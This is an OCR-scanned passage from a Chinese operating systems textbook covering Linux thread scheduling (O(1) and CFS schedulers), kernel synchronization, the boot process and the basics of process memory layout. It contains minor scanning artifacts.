PID 不 变 。 这 样 一 来 ， 一 个 进程 中 所 有 的 线程 都 会 拥有 与 该 进程 中 第 一 个 线程 相同 的 PID。 


10.3.4 Linux 中 的 调度 

现在 我 们 来 关注 Linux 系 统 的 调度 算法 。 首 先 要 认识 到 ，Linux 系 统 的 线程 是 内 核 线程 ， 所 以 Linux 
系统 的 调度 是 基于 线程 的 ， 而 不 是 基于 进程 的 。 

为 了 进行 调度 ，Linux 系 统 将 线程 区 分 为 三 类 : 

1) 实时 先入 先 出 。 

2) 实时 轮转 。 

3) 分 时 。 

实时 先入 先 出 线程 具有 最 高 优先 级 ， 它 不 会 被 其 他 线程 抢占 ， 除 非 那 是 一 个 刚刚 准备 好 的 、 拥 有 更 
高 优先 级 的 实时 先入 先 出 线程 。 实 时 轮转 线程 与 实时 先入 先 出 线程 基本 相同 ， 只 是 每 个 实时 轮转 线程 都 
有 一 个 时 间 量 ， 时 间 到 了 之 后 就 可 以 被 抢占 。 如 果 多 个 实时 轮转 线程 都 准备 好 了 ， 每 一 个 线程 运行 它 的 
时 间 量 所 规定 的 时 间 ， 然 后 插入 到 实时 轮转 线程 列表 的 末尾 。 事 实 上 ， 这 两 类 线程 都 不 是 真正 的 实时 线 
程 。 执 行 的 最 后 期 限 无 法 确定 ， 更 无 法 保证 最 后 期 限 前 线程 可 以 执行 完毕 。 这 两 类 线程 比 起 分 时 线程 来 
说 只 是 具有 更 高 的 优先 级 而 已 。Linux 系 统 之 所 以 称 它们 为 “实时 ”是 因为 Linux 系 统 遵循 的 P1003.4 标 
准 (UNIX 系 统 对 “实时 ”含义 的 扩展 ) 使 用 了 这 个 名 称 。 在 系统 内 部 ， 实 时 线程 的 优先 级 从 0 到 99，0 
是 实时 线程 的 最 高 优先 级 ，99 是 实时 线程 的 最 低 优 先 级 。 

传统 的 非 实 时 线程 形成 单独 的 类 并 由 单独 的 算法 进行 调度 ， 这 样 可 以 使 非 实时 线程 不 与 实时 线程 竞 
争 资源 。 在 系统 内 部 ， 这 些 线程 的 优先 级 从 100 到 139， 也 就 是 说 ，Linux 系 统 包含 140 个 不 同 的 优先 级 
(包括 实时 和 非 实 时 任务 ) 。 就 像 实 时 轮转 线程 一 样 ，Linux 系 统 根据 非 实时 线程 的 要 求 以 及 它们 的 优先 
级 分 配 CPU 时 间 片 。 

在 Linux 系 统 中 ， 时 间 片 是 由 时 钟 周 期 数 来 衡量 的 。 在 Linux 以 前 的 版 本 中 ， 时 钟 频率 如 果 是 
1000Hz， 则 每 个 时 钟 周期 是 1ms ， 称 为 最 小 时 间 间 隔 (jiffy ) 。 在 较 新 的 版 本 中 ， 时 钟 频率 可 设置 成 
500Hz、250Hz 甚 至 1Hz。 为 了 避免 浪费 用 于 检测 定时 器 中 断 所 用 CPU 周期 ， 内 核 甚至 可 以 设置 成 “滴答 ” 
模式 。 该 模式 在 两 种 情况 下 是 有 用 的 : 系统 中 只 有 一 个 进程 运行 ， 或 CPU 处 于 空闲 并 且 需 要 进入 省 电 模 
式 。 最 后 ， 在 较 新 的 系统 中 ， 高 分 辩 率 的 计时 器 允许 内 核 跟 踪 最 小 时 间 间 隔 下 更 细 粒 度 的 时 间 。 

像 大 多 数 UNIX 系 统一 样 ，Linux 系 统 给 每 个 线程 分 配 一 个 nice 值 〈( 即 优先 级 调节 值 ) 。 默 认 值 是 0， 
但 是 可 以 通过 调用 系统 调用 nice (value) 来 修改 ， 修 改 值 的 范围 从 -20 到 +19。 这 个 值 决定 了 线程 的 静 
态 优先 级 。 一 个 在 后 台大 量 计算 r 值 的 用 户 可 以 在 他 的 程序 里 调用 这 个 系统 调用 为 其 他 用 户 让 出 更 多 计 
算 资 源 。 只 有 系统 管理 员 可 以 要 求 比 普通 服务 更 好 的 服务 (意味 着 nice 函 数 参 数值 的 范围 从 一 20 到 一 1)。 
推断 这 条 规则 的 理由 作为 练习 留 给 读者 。 

接 下 来 ， 我 们 将 更 详细 地 讨论 Linux 系 统 的 两 个 调度 算法 。 它 们 的 内 部 与 调度 队列 的 设计 密切 相关 ， 
该 调度 队列 是 一 个 关键 的 数据 结构 ， 可 以 通过 调度 器 来 跟踪 系统 中 的 所 有 可 运行 的 任务 ， 并 选择 下 一 个 
要 运行 的 任务 进行 调度 。 调 度 队列 与 系统 中 的 每 一 个 CPU 都 相关 。 

Linux O(1) 调 度 器 (O(1) scheduler) 是 历史 上 一 个 流行 的 Linux 系 统 调度 程序 。 命 名 为 这 个 名 字 是 
因为 它 能 够 在 常数 时 间 内 执行 任务 调度 ， 例 如 从 执行 队列 中 选择 一 个 任务 或 将 一 个 任务 加 入 执行 队列 ， 
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这 与 系统 中 的 任务 总 数 无 关 。 在 O(1) 调 度 器 里 ， 调 度 队 列 被 组 织 成 两 个 数组 ， 一 个 是 任务 正在 活动 的 数 
组 ， 一 个 是 任务 过 期 失效 的 数组 。 如 图 10-10 所 示 ， 每 个 数组 都 包含 了 140 个 链表 头 ， 每 个 链表 具有 不 同 
的 优先 级 。 链 表 头 指向 给 定 优先 级 的 双向 进程 链表 。 调 度 的 基本 操作 如 下 所 述 。 

调度 器 从 正在 活动 数组 中 选择 一 个 优先 级 最 高 的 任务 。 如 果 这 个 任务 的 时 间 片 (时间 量 ) 过 期 失效 
了 ， 就 把 它 移动 到 过 期 失效 数组 中 (可 能 会 插入 到 优先 级 不 同 的 列表 中 ) 。 如 果 这 个 任务 阻塞 了 ， 比 如 
说 正在 等 待 JO 事 件 ， 那 么 在 它 的 时 间 片 过 期 失效 之 前 ， 一 旦 所 等 待 的 事件 发 生 ， 任 务 就 可 以 继续 运行 ， 
它 将 被 放 回 到 之 前 正在 活动 的 数组 中 ， 时 间 片 根据 它 所 消耗 的 CPU 时 间 相应 的 减少 。 一 旦 它 的 时 间 片 消 
耗 列 尽 ， 它 也 会 被 放 到 过 期 失效 数组 中 。 当 正在 活动 数组 中 没有 其 他 的 任务 了 ， 调 度 器 交换 指针 ， 使 得 
正在 活动 数组 变 为 过 期 失效 数组 ， 过 期 失效 数组 变 为 正在 活动 数组 。 这 种 方法 可 以 保证 低 优先 级 的 任务 
不 会 被 馈 死 (除非 实时 先入 先 出 线程 完全 占用 CPU， 但 是 这 种 情况 是 不 会 发 生 的 )。 

不 同 的 优先 级 被 赋予 不 同 的 时 间 片 长 度 ， 高 优先 级 的 进程 拥有 较 长 的 时 间 片 。 例 如 ， 优 先 级 为 100 
的 任务 可 以 得 到 800ms 的 时 间 片 ， 而 优先 级 为 139 的 任务 只 能 得 到 5ms 的 时 间 片 。 











活动 (数组 ) 
过 期 (数组 ) 


a) 每 个 CPU 上 的 调度 队列 b) CFS 调 度 中 每 个 CPU 的 红 黑 树 


图 10-10 Linux 调 度 队列 和 优先 级 数组 


这 种 调度 模式 的 思想 是 为 了 使 进程 更 快 地 出 入 内 核 。 如 果 一 个 进程 试图 读 取 一 个 磁盘 文件 ， 在 调用 
read 函 数 之 间 等 待 一 秒 钟 的 时 间 显 然 会 极 大 地 降低 进程 的 效率 。 每 个 请 求 完 成 之 后 让 进程 立即 运行 的 做 
法 会 好 得 多 ， 同 时 这 样 做 也 可 以 使 下 一 个 请 求 更 快 完成 。 相 似 地 ， 如 果 一 个 进程 因为 等 待 键盘 输入 而 阻 
塞 ， 那 么 它 明显 是 一 个 交互 进程 ， 这 样 的 进程 只 要 准备 好 运行 后 就 应 当 被 赋予 较 高 的 优先 级 ， 从 而 保证 
交互 进程 可 以 提供 较 好 的 服务 。 在 这 种 情况 下 ， 当 LO 密集 型 进程 和 交互 进程 被 阻塞 之 后 ，CPU 密 集 型 
进程 基本 上 可 以 得 到 所 有 被 留 下 的 服务 。 

由 于 Linux 系 统 (或 其 他 任何 操作 系统 ) 事先 不 知道 一 个 任务 究竟 是 IO 密集 型 的 ， 还 是 CPU 密集 的 ， 
它 只 是 依赖 于 连续 保持 的 交互 启发 式 方法 。 通 过 这 种 方式 ，Linux 系 统 区 分 静态 优先 级 和 动态 优先 级 。 
线程 的 动态 优先 级 不 断 地 被 重新 计算 ， 其 目的 在 于 : (1) 奖励 互动 进程 ，(2) 惩罚 占用 CPU 的 进程 。 在 
Linux O(1) 调 度 器 中 ， 最 高 的 优先 级 奖励 是 -5， 是 从 调度 器 接收 的 与 更 高 优先 级 相对 应 的 较 低 优先 级 的 
值 。 最 高 的 优先 级 惩罚 是 +5。 

调度 器 给 每 一 个 任务 维护 一 个 名 为 sleep_avg 的 变量 。 每 当 任务 被 唤醒 时 ， 这 个 变量 会 增加 ， 当 任务 
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被 抢占 或 时 间 量 过 期 时 ， 这 个 变量 会 相应 地 减少 。 减 少 的 值 用 来 动态 生成 优先 级 奖励 ， 奖 励 的 范围 从 -5 
到 +5。 当 一 个 线程 从 正在 活动 数组 移动 到 过 期 失效 数组 中 时 ， 调 度 器 会 重新 计算 它 的 优先 级 。 

O(1) 调 度 算 法 指 的 是 2.6 内 核 版 本 中 所 流行 的 调度 器 ， 最 初 引入 这 个 调度 算法 的 是 不 稳定 的 2.5 版 本 
内 核 。 早 期 的 调度 算法 在 多 处 理 器 环境 中 所 表现 的 性 能 十 分 低下 ， 并 且 当 任务 的 数量 大 量 增长 时 ， 不 能 
很 好 地 进行 调度 。 由 于 上 面 描述 的 内 容 说 明了 通过 访问 正在 活动 数组 就 可 以 做 出 调度 决定 ， 那 么 调度 可 
以 在 一 个 固定 的 时 间 O (1) 内 完成 ， 而 与 系统 中 进程 的 数量 无 关 。 然 而 ， 除 了 常数 时 间 操 作 表现 出 的 高 
性 能 之 外 ，O(1) 调 度 器 有 显著 的 缺点 。 最 值得 注意 的 是 ， 利 用 启发 式 方 法 来 确定 - Stee 会 
使 该 任务 的 优先 级 复杂 且 不 完善 ， 从 而 导致 在 处 理 交 互 任务 时 性 能 很 糟糕 。 

为 了 改进 该 缺点 ，O(1) 调 度 器 的 开发 者 Ingo Molnar 又 提出 了 一 个 新 的 调度 器 ， 该 调度 器 被 称 为 完全 
公平 调度 器 (Completely Fair Scheduler，CFS)。CFS 借 鉴 Con Kolivas 最 初 为 一 个 早期 的 调度 器 所 设计 
的 思路 ， 并 在 2.6.23 版 本 中 首次 被 集成 到 内 核 中 。 它 仍然 是 处 理 非 实 时 任务 的 默认 调度 器 。 

CFS 的 主要 思想 是 使 用 一 棵 红 黑 树 作 为 调度 队列 的 数据 结构 。 根 据 任 务 在 CPU 上 运行 的 时 间 长 短 而 
将 其 有 序 地 排列 在 树 中 ， 这 种 时 间 称 为 虚拟 运行 时 间 (vruntime)。CFS 采 用 ns 级 的 粒度 来 说 明 任 务 的 运 
行 时 间 。 如 图 10-10b 所 示 ， 树 中 的 每 个 内 部 节点 对 应 于 一 个 任务 。 左 侧 的 子 节 点 对 应 于 在 CPU 上 运行 时 
间 更 少 的 任务 ， 因 此 左 侧 的 任务 会 更 早 地 被 调度 ， 右 侧 的 子 节 点 是 那些 迄今 消耗 CPU 时 间 较 多 的 任务 ， 
叶子 节点 在 调度 器 中 不 起 任何 作用 。 

CFS 调 度 算 法 可 以 总 结 如 下 ， 该 算法 总 是 优先 调度 那些 使 用 CPU 时 间 最 少 的 任务 ， 通 常 是 在 树 中 最 
左边 节点 上 的 任务 。CEFS 会 周期 性 地 根据 任务 已 经 运行 的 时 间 ， 递 增 它 的 虚拟 运行 时 间 值 ， 并 将 这 个 值 
与 树 中 当前 最 左 节点 的 值 进行 比较 ， 如 果 正 在 运行 的 任务 仍 具有 较 小 虚拟 运行 时 间 值 ， 那 么 它 将 继续 运 
行 ， 否 则 ， 它 将 被 插入 红 黑 树 的 适当 位 置 ， 并 且 CPU 将 执行 新 的 最 左边 节点 上 的 任务 。 

考虑 到 任务 有 优先 级 的 差异 和 “友好 程度 " ， 因 而 当 一 个 任务 在 CPU 上 运行 时 ，CEFS 会 改变 该 任务 
的 虚拟 运行 时 间 流 逝 的 有 效 速率 。 对 于 优先 级 较 低 的 任务 ， 时 间 流 逝 更 快 ， 它 的 虚拟 运行 时 间 值 也 将 增 
加 得 更 快 ， 考 虑 到 系统 中 还 有 其 他 任务 ， 因 此 有 较 低 的 优先 级 的 任务 会 失去 CPU 的 使 用 权 ， 相 较 于 优先 
级 高 的 任务 更 快 地 重新 插入 树 中 。 以 这 种 方式 ，CFS 可 避免 使 用 不 同 的 调度 队列 结构 来 放置 不 同 优先 级 
的 任务 。 

总 之 ， 选 择 一 个 树 中 的 节点 来 运行 的 操作 可 以 在 常数 时 间 内 完成 ， 然 而 在 调度 队列 中 插入 一 个 任务 
需要 O(log(N)) 的 时 间 ， 其 中 N 是 系统 中 的 任务 数 。 考 虑 到 当前 系统 的 负载 水 平 ， 这 仍然 是 可 以 接受 的 ， 
但 随 着 节点 计算 能 力 以 及 它们 所 能 运行 的 任务 数 的 增加 ， 尤 其 是 在 服务 器 领域 ， 未 来 可 能 会 有 新 的 调度 
算法 被 提出 。 

除了 基本 的 任务 调度 算法 外 ，Linux 的 调度 器 还 包含 了 对 于 多 处 理 器 和 多 核 平台 而 言 非常 有 益 的 特 
性 。 首 先 ， 在 多 处 理 器 平台 上 ， 每 一 个 运行 队列 数据 结构 与 一 个 处 理 器 相对 应 ， 调 度 器 尽量 进行 亲 和 调 
度 ， 即 将 之 前 在 某 个 处 理 器 上 运行 过 的 任务 再 次 调 人 该 处 理 器 。 其 次 ， 为 了 更 好 地 描述 或 修改 一 个 选 定 
的 线程 对 亲 和 性 的 要 求 ， 有 一 组 系统 调用 可 供 使 用 。 最 后 ， 在 满足 特定 性 能 和 亲 和 要 求 的 前 提 下 ， 调 度 
ee 从 而 保证 整个 系统 的 加 载 是 平衡 的 。 

只 考虑 可 以 运行 的 任务 ， 这 些 任务 被 放 在 适当 的 调度 队列 当中 。 不 可 运行 的 任务 和 正在 等 
ene dep spe ng tr 即 等 待 队 列 。 每 一 种 任务 可 能 需要 等 待 
的 事件 对 应 了 一 个 等 待 队列 。 等 待 队 列 的 头 包 含 一 个 指向 任务 链表 的 指针 及 一 枚 自 旋 锁 。 为 了 保证 等 
待 队列 可 以 在 主 内 核 代 码 、 中 断 处 理 函 数 或 其 他 异步 处 理 请 求 代 码 中 进行 并 发 操作 ， 自 旋 锁 是 非常 必 
要 的 。 

Linux 系 统 中 的 同步 

上 一 节 中 提 到 Linux 系 统 使 用 自 旋 锁 来 防止 对 数据 结构 的 并 发 修改 ， 比 如 等 待 队 列 。 事 实 上 ， 内 核 
代码 在 很 多 地 方 都 含有 同步 变量 。 后 面 会 简要 总 结 一 下 Linux 系 统 所 实现 的 同步 机 制 。 

早期 的 Linux 内 核 只 有 一 个 大 内 核 锁 (Big Kernel Lock，BKL)。 由 于 它 阻止 了 不 同 的 处 理 器 并 发 运 
行内 核 代 码 ， 因 此 使 得 内 核 的 效率 非常 低下 ， 特 别 是 在 多 处 理 器 平台 上 。 所 以 ， 很 多 新 的 同步 点 被 更 加 
细 粒 度 地 引入 了 。 
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Linux 提 供 了 若干 不 同类 型 的 同步 变量 ， 这 些 变量 既 能 在 内 核 里 面 使 用 ， 也 提供 给 用 户 级 应 用 程序 
和 库 使 用 。 在 最 底层 ，Linux 系 统 通过 像 atomic_set 和 atomic_read 这 样 的 操作 为 硬件 支持 的 原子 指令 提供 
了 封装 。 此 外 ， 现 代 的 硬件 重新 排序 了 内 存 操作 ， 这 样 Linux 就 提供 了 内 存 屏障 。 使 用 像 rnb 和 wmb 这 样 
的 操作 保证 了 所 有 领先 于 屏障 调用 的 读 / 写 存储 器 操作 在 任何 后 续 的 访问 发 生 之 前 就 已 经 完成 。 

具有 较 高 级 别 的 同步 构造 更 为 常用 。 不 想 被 阻止 (考虑 到 性 能 或 正确 性 ) 的 线程 使 用 自 旋 锁 并 旋转 
读 / 写 锁 。 当 前 的 Linux 版 本 实现 了 所 谓 的 “基于 门票 ” 自 旋 锁 ， 它 在 SMP 和 多 核 系 统 上 具有 优秀 的 表现 。 
被 允许 或 需要 阻塞 的 线程 可 使 用 像 互 斥 量 和 信号 量 这 样 的 机 制 。Linux 支 持 像 mutex_trylock 和 
sem_trywait 这 样 的 非 阻 塞 调用 ， 用 于 在 无 需 阻 塞 下 判断 同步 变量 的 状态 。Linux 也 支持 其 他 的 同步 变量 ， 
如 futexes、completions、read-copy-update(RCU) 锁 等 。 最 后 ， 对 于 内 核 以 及 由 中 断 处 理事 务 所 执行 的 代 
码 之 间 的 同步 ， 可 以 通过 动态 地 禁用 和 启用 相应 的 中 断 来 实现 。 


10.3.5 启动 Linux 系 统 

每 个 平台 的 细节 都 有 不 同 ， 但 是 整体 来 说 ， 下 面 的 步 又 代表 了 启动 的 过 程 。 当 计算 机 启动 时 ， 
BIOS 加 电 自 检 (POST)， 并 对 硬件 进行 检测 和 初始 化 ， 这 是 因为 操作 系统 的 启动 过 程 可 能 会 依赖 于 磁 
盘 访 问 、 屏 幕 、 键 盘 等 。 接 下 来 ， 启 动 磁盘 的 第 一 个 遍 区 ， 即 主 引导 记录 (MBR)， 被 读 和 人 到 一 个 固定 
的 内 存 区 域 并 且 执行 。 这 个 分 区 中 含有 一 个 很 小 的 程序 (只 有 512 字 节 )， 这 个 程序 从 启动 设备 中 ， 比 如 
SATA 磁 盘 或 SCSI 磁 盘 ， 调 入 一 个 名 为 boot 的 独立 程序 。boot 程 序 将 自身 复制 到 高 地 址 的 内 存 当 中 从 而 
为 操作 系统 释放 低地 址 的 内 存 。 

复制 完成 后 ，boot 程 序 读 取 启 动 设备 的 根 目录 。 为 了 达到 这 个 目的 ，boot 程 序 必须 能 够 理解 文件 系 
统 和 目录 格式 ， 这 个 工作 通常 由 引导 程序 ， 如 GRUB (多 系统 启动 管理 器 ) ， 来 完成 。 其 他 流行 的 引导 
程序 ， 如 Intel 的 LILO， 不 依赖 于 任何 特定 的 文件 系统 。 相 反 ， 它 们 需要 一 个 块 映射 图 和 低层 地 址 ， 它 们 
描述 了 物理 扇 区 、 磁 头 和 磁道 ， 可 以 帮助 找到 相应 的 需要 被 加 载 的 扇 区 。 

然后 ，boot 程 序 读 入 操作 系统 内 核 ， 并 把 控制 交 给 内 核 。 从 这 里 开始 ，boot 程 序 完成 了 它 的 任务 ， 
系统 内 核 开 始 运行 。 

内 核 的 启动 代码 是 用 汇编 语言 写成 的 ， 具 有 较 高 的 机 器 依赖 性 。 主 要 的 工作 包括 创建 内 核 堆 栈 、 识 
别 CPU 类 型 、 计 算 可 用 内 存 、 禁 用 中 断 、 启 用 内 存 管理 单元 ， 最 后 调用 C 语 言 写成 的 main 函 数 开始 执行 
操作 系统 的 主要 部 分 。 

C 语 言 代码 也 有 相当 多 的 初始 化 工作 要 做 ,但 是 这 些 工作 更 逻辑 化 (而 不 是 物理 化 )。C 语 言 代 码 开 
始 的 时 候 会 分 配 一 个 消息 缓冲 区 来 帮助 调试 启动 出 现 的 问题 。 随 着 初始 化 工作 的 进行 ， 信 息 被 写 入 消息 
缓冲 区 ， 这 些 信息 与 当前 正在 发 生 的 事件 相关 ， 所 以 ， 如 果 出 现 启动 失败 的 情况 ， 这 些 信息 可 以 通过 一 
个 特殊 的 诊断 程序 调 出 来 。 我 们 可 以 把 它 当 作 是 操作 系统 的 “飞行 信息 记录 器 ”( 即 空难 发 生 后 ， 侦 查 
员 寻 找 的 黑 盒子 )。 

接 下 来 ， 内 核 数 据 结 构 得 到 分 配 。 大 部 分 内 核 数 据 结构 的 大 小 是 固定 的 ， 但 是 一 少 部 分 ， 如 页 面 组 
存 和 特殊 的 页 表 结 构 ， 依 赖 于 可 用 内 存 的 大 小 。 

从 这 里 开始 ， 系 统 进行 自动 配置 。 使 用 描述 何 种 设备 可 能 存在 配置 文件 ， 系 统 开始 探测 哪些 设备 是 
确实 存在 的 。 如 果 一 个 被 探测 的 设备 给 出 了 响应 ， 这 个 设备 就 会 被 加 入 到 已 连接 设备 表 中 。 如 果 它 没有 
响应 ， 就 假设 它 未 连接 或 直接 忽略 掉 它 。 不 同 于 传统 的 UNIX 版 本 ，Linux 系 统 的 设备 驱动 程序 不 需要 被 
静态 链接 至 内 核 中 ， 它 们 可 以 被 动态 加 载 (就 像 所 有 的 MS-DOS 和 Windows 版 本 一 样 )。 

关于 支持 和 反对 动态 加 载 驱 动 程序 的 争论 非常 有 趣 ， 值 得 简要 地 阐述 一 下 。 动 态 加 载 的 主要 论点 是 
同样 的 二 进 制 文件 可 以 分 发 给 具有 不 同系 统 配置 的 用 户 ， 这 个 二 进 制 文件 可 以 自动 加 载 它 所 需要 的 驱动 
程序 ， 甚 至 可 以 通过 网 络 加 载 。 反 对 动态 加 载 的 主要 论点 是 安全 。 如 果 你 正在 一 个 安全 的 环境 中 运行 计 
算 机 ， 比 如 说 银行 的 数据 库 系 统 或 者 公司 的 网 络 服务 器 ， 你 肯定 不 希望 其 他 人 向 内 核 中 插入 随机 代码 。 
系统 管理 员 可 以 在 一 个 安全 的 机 器 上 保存 系统 的 源 文 件 和 目标 文件 , 在 这 台 机 器 上 完成 系统 的 编译 链接 ， 
然后 通过 局 域 网 把 内 核 的 二 进 制 文件 分 发 给 其 他 的 机 器 。 如 果 驱 动 程序 不 能 被 动态 加 载 ， 这 就 阻止 了 那 
些 知 道 超 级 用 户 密码 的 计算 机 使 用 者 或 其 他 人 向 系统 内 核 注 入 恶意 或 漏洞 代码 。 而 且 ， 在 大 的 站 点 中 ， 
系统 编译 链接 的 时 候 硬 件 配置 都 是 已 知 的 。 需 要 重新 链接 系统 的 变化 非常 罕见 ， 即 使 是 在 系统 中 添加 一 
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个 硬件 设备 也 不 是 问题 。 

一 旦 所 有 的 硬件 都 配置 好 了 ， 接 下 来 要 做 的 事情 就 是 细心 地 手动 运行 进程 0， 建 立 它 的 堆栈 ， 运 行 
它 。 进 程 0 继续 进行 初始 化 ， 做 如 下 的 工作 : 配置 实时 时 钟 ， 挂 载 根 文件 系统 ， 创 建 init 进 程 (进程 1) 
和 页 面 守 护 进程 (进程 2)。 


init 进 程 检 测 它 的 标志 以 确定 它 应 该 为 单 用 户 还 是 多 用 户 服 务 。 前 一 种 情况 ， 它 调用 fork 函 数 创建 一 


个 shell 进 程 ， 并 且 等 待 这 个 进程 结束 。 后 一 种 情况 ， 它 调用 fork 函 数 创 建 一 个 运行 系统 初始 化 shell 脚 本 
( 即 /etc/re) 的 进程 ， 这 个 进程 可 以 进行 文件 系统 一 致 性 检测 、 挂 载 附 加 文件 系统 、 开 启 守护 进程 等 。 然 
后 这 个 进程 从 /etc/ttys 中 读 取 数 据 ， 其 中 /etc/ttys 列 出 了 所 有 的 终端 和 它们 的 属性 。 对 于 每 一 个 启用 的 终 
端 ， 这 个 进程 调用 fork 函 数 创建 一 个 自身 的 副本 ， 进 行内 部 处 理 并 运行 一 个 名 为 getty 的 程序 。 

getty 程 序 为 每 条 连 线 设置 传输 速率 和 其 他 属性 (比如 ， 有 一 些 可 能 是 调制 解 调 器 )， 然 后 在 终端 的 
屏幕 上 输出 : 


login: 


等 待 用 户 从 键盘 键入 用 户 名 。 当 有 人 坐 在 终端 前 ， 提 供 了 一 个 用 户 名 后 ，getty 程 序 就 结束 了 ， 登 录 程 序 
/bin/login 开 始 运行 。login 程 序 要 求 输入 密码 ， 给 密码 加 密 ， 并 与 保存 在 密码 文件 /etc/passwd 中 的 加 密 密 
码 进行 对 比 。 如 果 是 正确 的 ，login 程 序 以 用 户 shell 程 序 替 换 自身 ， 等 待 第 一 个 命令 。 如 果 是 不 正确 的 ， 
login 程 序 要 求 输入 另 一 个 用 户 名 。 这 种 机 制 如 图 10-11 所 示 ， 该 系统 具有 三 个 终端 。 






终端 2 


图 10-11 用 于 启动 一 些 Linux 系 统 的 进程 顺序 


在 图 中 ，0 号 终端 上 运行 的 getty 程 序 仍然 在 等 待 用 户 输入 。1 号 终端 上 ， 用 户 已 经 键入 了 登录 名 ， 所 
以 getty 程 序 已 经 用 login 程 序 替 换 掉 自身 ， 目 前 正在 等 待 用 户 输入 密码 。2 号 终端 上 ， 用 户 已 经 成 功 登 录 ， 
shell 程 序 显 示 提 示 符 (%)。 然 后 用 户 输入 

cp f1 f2 


shell 程 序 将 调用 fork 函 数 创建 一 个 子 进程 ， 并 使 这 个 子 进程 运行 cp 程序 。 然 后 shell 程 序 被 阻塞 ， 等 待 子 
进程 结束 ， 子 进程 结束 之 后 ，shell 程 序 会 显示 新 的 提示 符 并 且 读 取 键 盘 输 入 。 如 果 2 号 终端 的 用 户 不 是 
键入 了 cp 命令 而 是 cc 命令 ，C 语 言 编 译 器 的 主 程序 就 会 被 启动 ， 这 将 生成 更 多 的 子 进程 来 运行 不 同 的 编 
译 过 程 。 

10.4 Linux 中 的 内 存 管理 


Linux 的 内 存 模 型 简单 明了 ， 这 样 使 得 程序 可 移植 并 且 能 够 在 内 存 管理 单元 大 不 相同 的 机 器 上 实现 
Linux, kkn: 从 没有 内 存 管理 单元 的 机 器 (如 原始 的 [BM PC) 到 有 复杂 分 页 硬件 支持 的 机 器 。 这 一 块 
设计 领域 在 过 去 数 十 年 几乎 没有 发 生 改 变 。 下 面 要 介绍 该 模型 以 及 它 是 如 何 实现 的 。 
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10.4.1 基本 概念 

每 个 Linux 进 程 都 有 一 个 地 址 空间 ， 逻 辑 上 有 三 段 组 成 : 代码 、 数 据 和 堆栈 段 。 图 10-12a 中 的 进程 A 
就 给 出 了 一 个 进程 空间 的 例子 。 代 码 段 包 含 了 形成 程序 可 执行 代码 的 机 器 指令 。 它 是 由 编译 器 和 汇编 器 
把 C、C++ 或 者 其 他 程序 源码 转换 成 机 器 代码 而 产生 的 。 通 常 ， 代 码 段 是 只 读 的 。 由 于 难以 理解 和 调试 ， 
自修 改 程序 早 在 大 约 1950 年 就 不 再 时 兴 了 。 因 此 ,代码 段 既 不 增长 也 不 减少 ， 总 之 不 会 发 生 改变 。 


进程 A 进程 B 
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图 10-12 a) 进程 A 的 虚拟 地 址 空间 ，b) 物理 内 存 ，c) 进程 B 的 虚拟 地 址 空间 


数据 段 包 含 了 所 有 程序 变量 、 字 符 串 、 数 字 和 其 他 数据 的 存储 。 它 有 两 部 分 ， 初 始 化 数据 和 未 初始 
化 数据 。 由 于 历史 的 原因 ， 后 者 就 是 我 们 所 知道 的 BSS (历史 上 称 作 符号 起 始 块 ) 。 数 据 段 的 初始 化 部 
分 包括 编译 器 常量 和 那些 在 程序 启动 时 就 需要 一 个 初始 值 的 变量 。 所 有 BSS 部 分 中 的 变量 在 加 载 后 被 初 
始 化 为 0。 

例如 ， 在 C 语 言 中 可 以 在 声明 一 个 字符 串 的 同时 初始 化 它 。 当 程序 启动 的 时 候 ， 字 符 串 要 拥有 其 初 
始 值 。 为 了 实现 这 种 构造 ， 编 译 器 在 地 址 空间 给 字符 串 分 配 一 个 位 置 ， 同 时 保证 在 程序 启动 的 时 候 该 位 
置 包含 了 合适 的 字符 串 。 从 操作 系统 的 角度 来 看 ， 初 始 化 数据 跟 程序 代码 并 没有 什么 不 同一 一 二 者 都 包 
含 了 由 编译 器 产 出 的 位 串 ， 它 们 必须 在 程序 启动 的 时 候 加 载 到 内 存 。 

“未 初始 化 数据 的 存在 实际 上 仅仅 是 个 优化 。 如 果 一 个 全 局 变量 未 显 式 地 初始 化 ， 那 么 C 语 言 的 语义 说 
明 它 的 初始 值 是 0。 实 际 上 ， 大 部 分 全 局 变量 并 没有 显 式 初 始 化 ， 因 此 都 是 0。 这 些 可 以 简单 地 通过 设置 
可 执行 文件 的 一 个 段 来 实现 ， 其 大 小 刚好 等 于 数据 所 需 的 字 节 数 ， 同 时 初始 化 包括 缺 省 值 为 零 的 所 有 量 。 

然而 ， 为 了 节省 可 执行 文件 的 空间 ， 并 没有 这 样 做 。 取 而 代 之 的 是 ， 跟 随 在 程序 代码 之 后 ， 文 件 包 
含 所 有 显 式 初始 化 的 变量 。 那 些 未 初始 化 的 变量 都 被 收集 在 初始 化 数据 之 后 ， 因 此 编译 器 要 做 的 就 是 在 
文件 头 部 放 和 人 一 个 字段 说 明 要 分 配 的 字 节 数 。 

为 了 清楚 地 说 明 这 一 点 ， 再 考虑 图 10-12a。 这 里 代码 段 的 大 小 是 8KB ， 初 始 化 数据 段 的 大 小 也 是 
8KB 。 未 初始 化 数据 (BSS) 是 4KB。 可 执行 文件 仅 有 16KB (E + 初始 化 数据 ) ， 加 上 一 个 很 短 的 头 
部 来 告诉 系统 在 初始 化 数据 后 另外 再 分 配 4KB ， 同 时 在 程序 启动 之 前 把 它们 初始 化 为 0。 这 个 技巧 避免 
了 在 可 执行 文件 中 存储 4KB 的 0。 

为 了 避免 分 配 一 个 全 是 0 的 物理 页 框 ， 在 初始 化 的 时 候 ，Linux 就 分 配 了 一 个 静态 零 页 面 ， 即 一 个 全 
0 的 写 保护 页 面 。 当 加 载 程序 的 时 候 ， 未 初始 化 数据 区 域 被 设置 为 指向 该 零 页 面 。 当 一 个 进程 真正 要 写 
这 个 区 域 的 时 候 ， 写 时 复制 的 机 制 就 开始 起 作用 ， 一 个 实际 的 页 框 被 分 配给 该 进程 。 

跟 代 码 段 不 一 样 ， 数 据 段 可 以 改变 。 程 序 总 是 修改 它 的 变量 。 而 且 ， 许 多 程序 需要 在 执行 时 动态 分 
配 空间 。Linux 人 允许 数据 段 随 着 内 存 的 分 配 和 回收 而 增长 和 缩减 ， 通 过 这 种 机 制 来 解决 动态 分 配 的 问题 。 
有 一 个 系统 调用 brk ， 人 允许 程序 设置 其 数据 段 的 大 小 。 那 么 ， 为 了 分 配 更 多 的 内 存 ， 一 个 程序 可 以 增加 
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数据 段 的 大 小 。C 库 函数 malloc 通 常 被 用 来 分 配 内 存 ， 它 就 大 量 使 用 这 个 系统 调用 。 进 程 地 址 空间 描述 
符 包含 信息 : 进程 动态 分 配 的 内 存 区 域 (通常 叫 作 堆 ，heap) 的 范围 。 

